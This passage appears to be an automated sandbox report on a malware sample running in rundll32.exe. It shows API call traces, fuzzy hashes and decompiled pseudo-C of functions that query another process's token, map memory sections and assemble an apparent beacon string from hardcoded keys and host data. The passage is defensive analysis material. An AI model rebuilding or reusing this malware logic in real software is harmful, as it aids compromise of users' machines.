Part of subcall function 0463B550: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,0462252A,?,?), ref: 0463B5FE
Part of subcall function 0463B550: HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,0462252A,?,?), ref: 0463B622
Part of subcall function 0463B550: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,0462252A,?,?), ref: 0463B630

HeapFree.KERNEL32(00000000,?), ref: 0462255E
HeapFree.KERNEL32(00000000,?), ref: 0462256F
SetLastError.KERNEL32(00000000), ref: 04622572

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: c7f56726884ea095d1c3f0151f7c4983046164656317e084b63c6d2a2ba096a6
Instruction ID: e65945e4de02f39097c6c9d8236efa7a368ca5439a373b9ef1dfa61f82423302
Opcode Fuzzy Hash: c7f56726884ea095d1c3f0151f7c4983046164656317e084b63c6d2a2ba096a6
Instruction Fuzzy Hash: B0315836900519FFCF129F99CD5089EBFB5FF98711B00815AF911A2260E735AE60DF94

Uniqueness

Uniqueness Score: -1.00%

Function 046368BF, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04635409: lstrlen.KERNEL32(00000000,?,?,?,770F4620,?,?,?,?,04621222,?,?,?,?,?), ref: 04635463
Part of subcall function 04635409: lstrlen.KERNEL32(?,?,?,?,770F4620,?,?,?,?,04621222,?,?,?,?,?), ref: 04635481
Part of subcall function 04635409: RtlAllocateHeap.NTDLL(00000000,73B76985,?), ref: 046354AD
Part of subcall function 04635409: memcpy.NTDLL(00000000,00000000,00000000,?,770F4620,?,?,?,?,04621222,?,?,?,?,?), ref: 046354C4
Part of subcall function 04635409: HeapFree.KERNEL32(00000000,00000000), ref: 046354D7
Part of subcall function 04635409: memcpy.NTDLL(00000000,?,?,?,770F4620,?,?,?,?,04621222,?,?,?,?,?), ref: 046354E6

GetLastError.KERNEL32 ref: 0463695E

Part of subcall function 0463B550: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,0462252A,?,?), ref: 0463B5FE
Part of subcall function 0463B550: HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,0462252A,?,?), ref: 0463B622
Part of subcall function 0463B550: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,0462252A,?,?), ref: 0463B630

HeapFree.KERNEL32(00000000,?), ref: 0463697A
HeapFree.KERNEL32(00000000,?), ref: 0463698B
SetLastError.KERNEL32(00000000), ref: 0463698E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: d43d4d73bea5dfb38a29bbfa45580321dd995304eb9c43da023a9dbfe20cb6b2
Instruction ID: ccbf3a0cfd7bab0567cd545d4a63d34bd19c1c55fddbcae1c9b571c81a94d57c
Opcode Fuzzy Hash: d43d4d73bea5dfb38a29bbfa45580321dd995304eb9c43da023a9dbfe20cb6b2
Instruction Fuzzy Hash: C9316B36900109FFCF129F99DC4089EBFB5FF98725B104156FA11A2260E731AA61DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0462DCCE, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0463DC21,00000000,00000000,00000004,00000000,?,0462815A,?,?,00000000), ref: 0462DCDA

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

Part of subcall function 04641DEB: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,0462DD08,00000000,00000001,00000001,?,?,0463DC21,00000000,00000000,00000004,00000000), ref: 04641DF9
Part of subcall function 04641DEB: StrChrA.SHLWAPI(?,0000003F,?,?,0463DC21,00000000,00000000,00000004,00000000,?,0462815A,?,?,00000000,0463A5C8,?), ref: 04641E03

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0463DC21,00000000,00000000,00000004,00000000,?,0462815A,?), ref: 0462DD38
lstrcpy.KERNEL32(00000000,00000000), ref: 0462DD48
lstrcpy.KERNEL32(00000000,00000000), ref: 0462DD54

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: c5caa1182d3fe736e2e8a26bf09ef0d18a0877d4b3c383a19d3b7f1238228c3c
Instruction ID: e423b19ed4b6c3455ae11aa1753a81b4caf6f3cc8c0f2706ee281f8ee5d016df
Opcode Fuzzy Hash: c5caa1182d3fe736e2e8a26bf09ef0d18a0877d4b3c383a19d3b7f1238228c3c
Instruction Fuzzy Hash: 6B21D272500E65BFDF125F64C988AAE7FB9DF56294B058055F8059B202FB34E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0463EB24, Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(63699BC3,?,?,00000000,04626726,00000000,?,74666F53,00000000,63699BC3,?,?,?,?,?,63699BC3), ref: 0463EB35
lstrlen.KERNEL32(?,?,?,00000000,04626726,00000000,?,74666F53,00000000,63699BC3,?,?,?,?,?,63699BC3), ref: 0463EB3A

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,04626726,00000000,?,74666F53,00000000,63699BC3,?,?,?), ref: 0463EB56
lstrcpy.KERNEL32(00000000,?), ref: 0463EB74

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$AllocateHeaplstrcpymemcpy
String ID:
API String ID: 1697500751-0
Opcode ID: b2cf34995cc8179d469339ada07ce62c471cdacb7cfe7e12487dab3dc8d9c837
Instruction ID: 690a5ceffa7307f8f2c6cdfa873e63f525b38722a6fceb408da68d51514e3a33
Opcode Fuzzy Hash: b2cf34995cc8179d469339ada07ce62c471cdacb7cfe7e12487dab3dc8d9c837
Instruction Fuzzy Hash: FAF0467B400B80BBD7226B69DC48E5B7B9CEFC4311F050055E50683200F736E414CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0463764C, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05D39A76,00000000,00000000,73BB81D0,046305F3,00000000), ref: 0463765C
lstrlen.KERNEL32(?), ref: 04637664

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

lstrcpy.KERNEL32(00000000,05D39A76), ref: 04637678
lstrcat.KERNEL32(00000000,?), ref: 04637683

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: b2852542792075f4041edfeb5ef0219f1f06bab5e70170ab1f688e2655744c6f
Instruction ID: 9e28a5d5ebe9b07aed8dbef012241d48ee4b86e0da3d801b6f3948ac45b4b86a
Opcode Fuzzy Hash: b2852542792075f4041edfeb5ef0219f1f06bab5e70170ab1f688e2655744c6f
Instruction Fuzzy Hash: F5E0D877901621AB8F116BE8AC4CC9FBBADEFCAA513055416F600D3101EB28DC10CBE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6716 Parent PID: 6560 rundll32.exeCOMMON

Executed Functions

Function 04E95A27, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E04E95A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04E9A71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04E9A734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x04e95a34
0x04e95a35
0x04e95a36
0x04e95a37
0x04e95a38
0x04e95a3c
0x04e95a43
0x04e95a52
0x04e95a55
0x04e95a58
0x04e95a5f
0x04e95a62
0x04e95a65
0x04e95a68
0x04e95a6b
0x04e95a76
0x04e95a78
0x04e95a81
0x04e95a89
0x04e95a8b
0x04e95a9d
0x04e95aa7
0x04e95aab
0x04e95aba
0x04e95abe
0x04e95ac7
0x04e95acf
0x04e95acf
0x04e95ad1
0x04e95ad1
0x04e95ad9
0x04e95adf
0x04e95ae3
0x04e95ae3
0x04e95aee

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04E95A6E
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04E95A81
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04E95A9D

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04E95ABA
memcpy.NTDLL(00000000,00000000,0000001C), ref: 04E95AC7
NtClose.NTDLL(?), ref: 04E95AD9
NtClose.NTDLL(00000000), ref: 04E95AE3

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 73b1db48abb538eff9cb403db03edfcd48a8d4b0e58245939c55a00c2e47cca3
Instruction ID: 1c8baa3291f7cda34d222a179a1361ae2a0834fbc8a5750dec238e1baaa71763
Opcode Fuzzy Hash: 73b1db48abb538eff9cb403db03edfcd48a8d4b0e58245939c55a00c2e47cca3
Instruction Fuzzy Hash: 3C211672900218BBDF01AF95DC85ADEBFBDEF08740F204022F905E6190D7B59E449BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E96604, Relevance: 3.1, APIs: 2, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E04E96604(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E04E94E06(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x04e9660d
0x04e96614
0x04e96615
0x04e96616
0x04e96617
0x04e96618
0x04e96629
0x04e9662d
0x04e96641
0x04e96644
0x04e96647
0x04e9664e
0x04e96651
0x04e96658
0x04e9665b
0x04e9665e
0x04e96661
0x04e96666
0x04e966a1
0x04e96668
0x04e9666b
0x04e96671
0x04e96676
0x04e9667a
0x04e96698
0x04e9667c
0x04e96683
0x04e96691
0x04e96691
0x04e9667a
0x04e966a9

APIs

NtCreateSection.NTDLL(?,000F001F,?,00000001,?,08000000,00000000,73B74EE0,00000000,00000000,04E959EC), ref: 04E96661

Part of subcall function 04E94E06: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04E96676,00000002,00000000,?,?,00000000,?,?,04E96676,00000000), ref: 04E94E33

memset.NTDLL ref: 04E96683

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID:
API String ID: 2533685722-0
Opcode ID: ddfb16f408e217b3eb55238df967420ddf3b264ca397b7c81a22c137560bf82a
Instruction ID: b3d71a1805e88a1ae3259906143d31035889ef3d873e7a6a33209888fd82772c
Opcode Fuzzy Hash: ddfb16f408e217b3eb55238df967420ddf3b264ca397b7c81a22c137560bf82a
Instruction Fuzzy Hash: A7211DB2D00209AFDF11DFA9C8849DEFBF9EF48354F10482AE515F7250D731AA458B64

Uniqueness

Uniqueness Score: -1.00%

Function 04E94E06, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04E94E06(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x04e94e18
0x04e94e1e
0x04e94e2c
0x04e94e33
0x04e94e38
0x04e94e3e
0x00000000
0x04e94e3f
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04E96676,00000002,00000000,?,?,00000000,?,?,04E96676,00000000), ref: 04E94E33

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: bd7f5f06c6f6617166d5924136538c73439d7dcf67ccf7586f135d81155d3ffa
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 0DF082B590420DBFDB119FA4CC84CAFBBFCEB44394B104939B152E1090D230AE088A60

Uniqueness

Uniqueness Score: -1.00%

Function 04E94AB6, Relevance: 33.2, APIs: 22, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E04E94AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t89;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x4e9d018; // 0xbdb28b76
				asm("bswap eax");
				_t61 =  *0x4e9d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x4e9d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x4e9d00c; // 0x81762942
				asm("bswap eax");
				_t64 =  *0x4e9d2a8; // 0x9aa5a8
				_t3 = _t64 + 0x4e9e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x4e9d02c,  *0x4e9d004, _t59);
				_t67 = E04E956CD();
				_t68 =  *0x4e9d2a8; // 0x9aa5a8
				_t4 = _t68 + 0x4e9e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E04E958DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x4e9d2a8; // 0x9aa5a8
					_t7 = _t126 + 0x4e9e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x4e9d238, 0, _v8);
				}
				_t73 = E04E9A199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x4e9d2a8; // 0x9aa5a8
					_t11 = _t121 + 0x4e9e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x4e9d238, 0, _v8);
				}
				_t146 =  *0x4e9d32c; // 0x58495b0
				_t75 = E04E94622( &E04E9D00A, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x4e9d238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x4e9d238, 0, 0x800); // executed
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x4e9d238, _t152, _v20);
						goto L26;
					}
					E04E9518F(GetTickCount());
					_t82 =  *0x4e9d32c; // 0x58495b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x4e9d32c; // 0x58495b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x4e9d32c; // 0x58495b0
					_t89 = E04E91BB6(1, _t143, _a16,  *_t88); // executed
					_t148 = _t89;
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						RtlFreeHeap( *0x4e9d238, _t152, _v8); // executed
						goto L25;
					}
					StrTrimA(_t148, 0x4e9c28c);
					_push(_t148);
					_t94 = E04E9361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x4e9d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04E99070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E04E96761();
						L22:
						HeapFree( *0x4e9d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E04E969B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_t111 = E04E9391F(_t157, _a4, _a8, _a12); // executed
						_v12 = _t111;
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E04E9A734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04E95800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04E9A734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x04e94ab6
0x04e94ab6
0x04e94ab6
0x04e94abf
0x04e94ac8
0x04e94aca
0x04e94aca
0x04e94ad7
0x04e94ae2
0x04e94ae5
0x04e94aea
0x04e94af3
0x04e94af6
0x04e94afb
0x04e94afe
0x04e94b03
0x04e94b06
0x04e94b12
0x04e94b1f
0x04e94b21
0x04e94b27
0x04e94b2c
0x04e94b37
0x04e94b39
0x04e94b3c
0x04e94b3e
0x04e94b43
0x04e94b49
0x04e94b4e
0x04e94b51
0x04e94b56
0x04e94b63
0x04e94b65
0x04e94b6b
0x04e94b75
0x04e94b75
0x04e94b77
0x04e94b7c
0x04e94b81
0x04e94b84
0x04e94b89
0x04e94b96
0x04e94b98
0x04e94ba6
0x04e94ba6
0x04e94ba8
0x04e94bb6
0x04e94bbb
0x04e94bbd
0x04e94bc2
0x04e94d83
0x04e94d8d
0x04e94d96
0x04e94bc8
0x04e94bd4
0x04e94bda
0x04e94bdf
0x04e94d77
0x04e94d81
0x00000000
0x04e94d81
0x04e94beb
0x04e94bf0
0x04e94bf9
0x04e94c0a
0x04e94c0e
0x04e94c17
0x04e94c1d
0x04e94c27
0x04e94c2c
0x04e94c33
0x04e94c3c
0x04e94c42
0x04e94d6b
0x04e94d75
0x00000000
0x04e94d75
0x04e94c4e
0x04e94c54
0x04e94c55
0x04e94c5a
0x04e94c5f
0x04e94d61
0x04e94d69
0x00000000
0x04e94d69
0x04e94c68
0x04e94c6f
0x04e94c77
0x04e94c7c
0x04e94c85
0x04e94c90
0x04e94c95
0x04e94c9a
0x04e94d99
0x04e94d4d
0x04e94d4d
0x04e94d52
0x04e94d5d
0x04e94d5f
0x00000000
0x04e94d5f
0x04e94ca4
0x04e94ca9
0x04e94cae
0x04e94cb3
0x04e94cbe
0x04e94cc3
0x04e94cc6
0x04e94ccc
0x04e94cd2
0x04e94cd8
0x04e94cdb
0x04e94ce1
0x04e94ce4
0x04e94ce9
0x04e94ced
0x04e94ced
0x04e94cf9
0x04e94d05
0x04e94d09
0x04e94d0b
0x04e94d10
0x04e94d12
0x04e94d17
0x04e94d1c
0x04e94d29
0x04e94d31
0x04e94d34
0x04e94d34
0x04e94d10
0x00000000
0x04e94cfb
0x04e94cff
0x04e94d36
0x04e94d39
0x04e94d42
0x00000000
0x00000000
0x00000000
0x00000000
0x04e94d42
0x04e94d01
0x00000000
0x04e94d01
0x04e94cf9

APIs

GetTickCount.KERNEL32 ref: 04E94ACA
wsprintfA.USER32 ref: 04E94B1A
wsprintfA.USER32 ref: 04E94B37
wsprintfA.USER32 ref: 04E94B63
HeapFree.KERNEL32(00000000,?), ref: 04E94B75
wsprintfA.USER32 ref: 04E94B96
HeapFree.KERNEL32(00000000,?), ref: 04E94BA6
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04E94BD4
GetTickCount.KERNEL32 ref: 04E94BE5
RtlEnterCriticalSection.NTDLL(05849570), ref: 04E94BF9
RtlLeaveCriticalSection.NTDLL(05849570), ref: 04E94C17

Part of subcall function 04E91BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04E920C2,?,058495B0), ref: 04E91BE1
Part of subcall function 04E91BB6: lstrlen.KERNEL32(?,?,?,04E920C2,?,058495B0), ref: 04E91BE9
Part of subcall function 04E91BB6: strcpy.NTDLL ref: 04E91C00
Part of subcall function 04E91BB6: lstrcat.KERNEL32(00000000,?), ref: 04E91C0B
Part of subcall function 04E91BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04E920C2,?,058495B0), ref: 04E91C28

StrTrimA.SHLWAPI(00000000,04E9C28C,?,058495B0), ref: 04E94C4E

Part of subcall function 04E9361A: lstrlen.KERNEL32(05849A78,00000000,00000000,745EC740,04E920ED,00000000), ref: 04E9362A
Part of subcall function 04E9361A: lstrlen.KERNEL32(?), ref: 04E93632
Part of subcall function 04E9361A: lstrcpy.KERNEL32(00000000,05849A78), ref: 04E93646
Part of subcall function 04E9361A: lstrcat.KERNEL32(00000000,?), ref: 04E93651

lstrcpy.KERNEL32(00000000,?), ref: 04E94C6F
lstrcpy.KERNEL32(?,?), ref: 04E94C77
lstrcat.KERNEL32(?,?), ref: 04E94C85
lstrcat.KERNEL32(?,00000000), ref: 04E94C8B

Part of subcall function 04E99070: lstrlen.KERNEL32(?,00000000,05849A98,00000000,04E98808,05849C76,?,?,?,?,?,63699BC3,00000005,04E9D00C), ref: 04E99077
Part of subcall function 04E99070: mbstowcs.NTDLL ref: 04E990A0
Part of subcall function 04E99070: memset.NTDLL ref: 04E990B2

wcstombs.NTDLL ref: 04E94D1C

Part of subcall function 04E9391F: SysAllocString.OLEAUT32(?), ref: 04E9395A
Part of subcall function 04E9391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04E939DD

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

HeapFree.KERNEL32(00000000,?,?), ref: 04E94D5D
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04E94D69
RtlFreeHeap.NTDLL(00000000,?,?,058495B0), ref: 04E94D75
HeapFree.KERNEL32(00000000,?), ref: 04E94D81
RtlFreeHeap.NTDLL(00000000,?), ref: 04E94D8D

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 603507560-0
Opcode ID: 4659a1590d0623e2f82a38a3d0d807b41e257e8cdcdfe727dac27fe3e213c2f2
Instruction ID: 0d8c165906c20d085495a309dc030850e1808839875c85668fd73e7b4fdb0a99
Opcode Fuzzy Hash: 4659a1590d0623e2f82a38a3d0d807b41e257e8cdcdfe727dac27fe3e213c2f2
Instruction Fuzzy Hash: 9A913871900218BFDF11EFA5DC88EAABBB9EF08315F144455E904972E0DB39ED51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04E9AC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E04E9AC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
